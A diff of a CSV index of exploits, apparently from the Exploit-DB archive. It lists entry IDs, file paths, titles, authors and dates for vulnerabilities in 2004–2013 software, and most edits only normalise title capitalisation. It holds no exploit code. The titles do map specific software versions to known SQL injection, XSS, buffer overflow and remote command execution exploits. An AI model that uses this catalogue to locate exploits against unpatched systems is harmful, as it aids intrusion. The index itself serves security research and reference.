Vulnerabilities",2004-02-03,Philip,php,webapps,0 -23640,platforms/php/webapps/23640.txt,"PHPMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0 +23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0 23641,platforms/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (1)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy",2004-02-03,"Andreas Sandblad",windows,remote,0 @@ -20866,8 +20867,8 @@ id,file,description,date,author,platform,type,port 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0 -23651,platforms/php/remote/23651.rb,"Wordpress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 -23652,platforms/php/remote/23652.rb,"Wordpress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 @@ -20890,15 +20891,15 @@ id,file,description,date,author,platform,type,port 23673,platforms/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,php,webapps,0 23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 23675,platforms/windows/remote/23675.txt,"Microsoft Windows XP - HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote,0 -23676,platforms/asp/webapps/23676.txt,"MaxWebPortal 1.3x - down.asp HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 -23677,platforms/asp/webapps/23677.txt,"MaxWebPortal 1.3x - Personal Message SendTo Parameter Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 +23676,platforms/asp/webapps/23676.txt,"Maxwebportal 1.3x - down.asp HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 +23677,platforms/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message SendTo Parameter Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 23678,platforms/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote,0 23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 23681,platforms/windows/dos/23681.pl,"EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 -23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 -23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -20915,16 +20916,16 @@ id,file,description,date,author,platform,type,port 23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (1)",2004-02-16,gsicht,windows,dos,0 23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 -23711,platforms/php/webapps/23711.txt,"Ecommerce Corporation Online Store Kit 3.0 - More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 -23712,platforms/php/webapps/23712.txt,"Ecommerce Corporation Online Store Kit 3.0 - More.php Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 23713,platforms/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",windows,dos,0 23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos,0 23716,platforms/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 -23718,platforms/php/webapps/23718.txt,"Ecommerce Corporation Online Store Kit 3.0 - shop.php cat Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23719,platforms/php/webapps/23719.txt,"Ecommerce Corporation Online Store Kit 3.0 - shop_by_brand.php cat_manufacturer Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23720,platforms/php/webapps/23720.txt,"Ecommerce Corporation Online Store Kit 3.0 - listing.php id Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23718,platforms/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - shop.php cat Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23719,platforms/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - shop_by_brand.php cat_manufacturer Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23720,platforms/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - listing.php id Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0 23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - multiplechoice/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - glossary.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 @@ -20939,14 +20940,14 @@ id,file,description,date,author,platform,type,port 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 -23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0 +23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0 -23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - Functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 +23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 - u2uadmin.php uid Parameter Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 @@ -20954,7 +20955,7 @@ id,file,description,date,author,platform,type,port 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0 -23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 +23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 @@ -20971,7 +20972,7 @@ id,file,description,date,author,platform,type,port 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 -23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 +23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 23769,platforms/windows/dos/23769.pl,"argosoft ftp server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection",2004-03-01,"David Sopas Ferreira",php,webapps,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 @@ -20985,7 +20986,7 @@ id,file,description,date,author,platform,type,port 23779,platforms/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",linux,dos,0 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 - Crash (PoC)",2012-12-31,IndonesiaGokilTeam,windows,dos,0 23781,platforms/php/webapps/23781.txt,"MyBB - 'editpost.php posthash' SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar - 'index.php date parameter' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar - 'index.php date Parameter' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 @@ -20999,13 +21000,13 @@ id,file,description,date,author,platform,type,port 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 23793,platforms/osx/dos/23793.txt,"Apple Safari 1.x - Large JavaScript Array Handling Denial of Service",2004-03-06,kang,osx,dos,0 -23794,platforms/linux/remote/23794.txt,"PWebServer 0.3.x - Remote Directory Traversal",2004-03-08,"Donato Ferrante",linux,remote,0 +23794,platforms/linux/remote/23794.txt,"PWebServer 0.3.x - Directory Traversal",2004-03-08,"Donato Ferrante",linux,remote,0 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - Pop Parameter Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 - Mailto Parameter Quoting Zone Bypass",2004-03-09,shaun2k2,windows,remote,0 23797,platforms/php/webapps/23797.txt,"Confixx 2 - DB Parameter SQL Injection",2004-03-09,wkr,php,webapps,0 23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps,0 23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String",2004-03-10,"Luigi Auriemma",multiple,dos,0 -23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0 +23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Directory Traversal",2004-03-10,"Corsaire Limited",osx,remote,0 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 @@ -21026,12 +21027,12 @@ id,file,description,date,author,platform,type,port 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23819,platforms/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x - profile.php target Parameter Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 -23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 +23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - search.php search_results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - forumdisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - showthread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 -23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Cross-Site Request Forgery Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 +23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Cross-Site Request Forgery Resulting in Arbitrary JavaScript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - Cross-Site Request Forgery Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 23830,platforms/linux/dos/23830.py,"Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)",2013-01-02,xistence,linux,dos,5655 23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0 @@ -21041,7 +21042,7 @@ id,file,description,date,author,platform,type,port 23836,platforms/windows/remote/23836.txt,"IBM Lotus Domino 6/7 - HTTP webadmin.nsf Directory Traversal",2004-03-17,dr_insane,windows,remote,0 23837,platforms/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,windows,remote,0 23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0 -23839,platforms/windows/dos/23839.pl,"GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 - SITE Command Remote Buffer Overflow",2004-03-17,storm,windows,dos,0 +23839,platforms/windows/dos/23839.pl,"GlobalScape Secure FTP Server 2.0 Build 03.11.2004.2 - Site Command Remote Buffer Overflow",2004-03-17,storm,windows,dos,0 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0 23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service",2004-03-17,"Beyond Security",windows,dos,0 @@ -21058,14 +21059,14 @@ id,file,description,date,author,platform,type,port 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - register.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 -23856,platforms/php/remote/23856.rb,"Wordpress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 +23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - comment_add.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - category_news_headline.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - more.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - category_news.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 +23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0 23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 @@ -21077,7 +21078,7 @@ id,file,description,date,author,platform,type,port 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 - vfs_getvfssw function Privilege Escalation",2004-03-23,"Sinan Eren",solaris,local,0 -23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan Viruswall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0 +23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0 23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",hardware,dos,0 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 @@ -21086,7 +21087,7 @@ id,file,description,date,author,platform,type,port 23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 - Invscoutd Symbolic Link",2003-05-29,watercloud,aix,local,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 -23886,platforms/windows/webapps/23886.txt,"simple webserver 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 +23886,platforms/windows/webapps/23886.txt,"simple WebServer 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - nssyslogd.exe Buffer Overflow",2013-01-04,Metasploit,windows,remote,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23969,platforms/windows/remote/23969.rb,"IBM Cognos - tm1admsd.exe Overflow",2013-01-08,Metasploit,windows,remote,0 @@ -21102,7 +21103,7 @@ id,file,description,date,author,platform,type,port 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 - Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",hardware,dos,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 -23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 +23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download",2004-04-01,"Donato Ferrante",windows,remote,0 @@ -21110,10 +21111,10 @@ id,file,description,date,author,platform,type,port 23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - myhome.php SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0 -23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 - MSWebDVD Object Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6 - MSWebDVD Object Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 - index.fts folder Parameter Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps,0 -23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 +23913,platforms/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - index.fts folder Parameter Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps,0 +23914,platforms/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 - ascontrol.dll Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21157,8 +21158,8 @@ id,file,description,date,author,platform,type,port 23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php parentId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - tiki-index.php comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 